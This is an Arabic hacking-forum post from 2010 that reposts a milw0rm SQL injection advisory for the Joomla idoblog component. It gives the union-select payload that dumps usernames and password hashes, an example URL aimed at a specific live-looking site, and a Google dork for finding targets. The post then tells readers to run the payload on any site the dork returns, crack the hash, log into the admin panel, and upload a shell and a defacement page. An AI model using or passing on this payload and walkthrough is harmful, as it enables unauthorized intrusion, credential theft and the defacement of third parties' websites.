عرض مشاركة واحدة
قديم 05-06-2010, 11:18 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Multi_Hacker
 
الصورة الرمزية Multi_Hacker
 

 

 
إحصائية العضو






Multi_Hacker غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Multi_Hacker is on a distinguished road

افتراضي نفسك بشل ادخل هنا (Joomla Component idoblog 1.1b30)


السلام عليكم ورحمة الله وبركاته


انا اليوم لقيتلكم ثغرة حلووة

تابعو معى نشوف الثغره + شرحها سريع

كود PHP:
#####################################################################################
####                    com_idoblog SQL Injection ALL VERSIONS                     ####
#####################################################################################
#                                                                                   #
# Descubierto por : KKR                                                             # 
# Somos: knet, kiko, ricota, servl                                                  # 
# Contacto: elricota[*A*T*]gmail[*D*O*T]com                                         #                        
#####################################################################################
[+]    Ediciones anteriores tenian las mismas fallas pero no fixearon todo...
[+]    
Esta sql injection afecta todas las versiones
[-]
[+] 
exploit
[-] /
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=<usuario existente>+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
[+]
[-]    
Ejemplo:
[+]    
http://www.rayservpc.co.uk/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
[-]
[+] 
d0rkinurl:"com_idoblog"
[-] http://www.diosdelared.com // http://www.remoteexecution.net/foro/
[-----------------------------------------------------------------------------------]
 
note:
<
name>idoblog</name>
<
creationDate>17 07 2008</creationDate>
<
author>Sunshine studio</author>
<
authorEmail>kotofeus@mail.ru</authorEmail>
<
authorUrl>http://sunshinestudio.ru</authorUrl>
<copyright>Sunshine studio</copyright>
<
license>Creative Commons v3.0</license>
<
version>v 1.1 (build 30)</version>
<
description>Blogs-system for Joomla 1.5</description
المصدر

http://www.milw0rm.com/exploits/9413


حلو ننسخ الدورك في google


بيطلع مواقع كتيره ~


نفتح أى موقع وننسخ الإستغلال ونحط الإستغلال بعد رآبط الموقع ~

كود PHP:
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users-- 
احيانا بيكون اليوزر admin بيكون مكتوب

هادا طلع مثلا اليوزر

argonaught


والباس مشفرر فك التشفير وروح على لوحة التحكم مسارها على نسبة 90% من الثغره

administrator
وقليل راح تلاقيها admin او مغيره

روحو ع اللوحة وارفوع اندكس وشل

ومبرووك عليكم

تحياتي



kts; fag h]og ikh (Joomla Component idoblog 1>1b30)

التوقيع




للمراسلة

علمني,اخترقلي = بلوك+ديليت

Moory30[at]Hotmail[dot]com
Skype: OMARATIONz


 


التعديل الأخير تم بواسطة Multi_Hacker ; 05-06-2010 الساعة 11:21 PM.

   

رد مع اقتباس